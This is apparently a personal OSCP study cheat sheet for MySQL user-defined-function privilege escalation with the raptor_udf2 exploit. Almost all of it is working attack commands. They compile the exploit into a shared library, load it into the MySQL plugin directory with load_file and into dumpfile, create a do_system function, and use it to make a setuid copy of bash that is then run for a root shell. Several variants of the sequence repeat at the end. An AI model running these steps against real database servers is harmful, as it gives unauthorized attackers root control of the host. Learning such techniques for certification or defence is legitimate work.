Testes on mysql version 5.1
Exploit location
/home/jay/Documents/tool_for_oscp/Linux-PrivEsc-Tools/tools/service-exploitsExploit transfer then compilation
gcc -g -c raptor_udf2.c #32 bit
gcc -g -c raptor_udf2.c -fPIC # 64bit
## Creating a shared object from the compiled code and is necessary for udf to work
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Connecting to mysql
mysql -u root -p
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/tmp/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
select * from foo into dumpfile '/usr/lib/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
exit
/tmp/rootbash -p
create table foo1(line blob);
insert into foo1 values(load_file('/tmp/raptor_udf2.so'));
select * from foo1 into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');
create table trenchesofit(line blob);
insert into trenchesofit values(load_file('/tmp/raptor1_udf2.so'));
select * from trenchesofit into dumpfile '/usr/lib/mysql/plugin/raptor1_udf2.so';
create function sys_exec returns integer soname 'raptor1_udf2.so';
\! cp raptor1_udf2.so /usr/lib/mysql/plugin/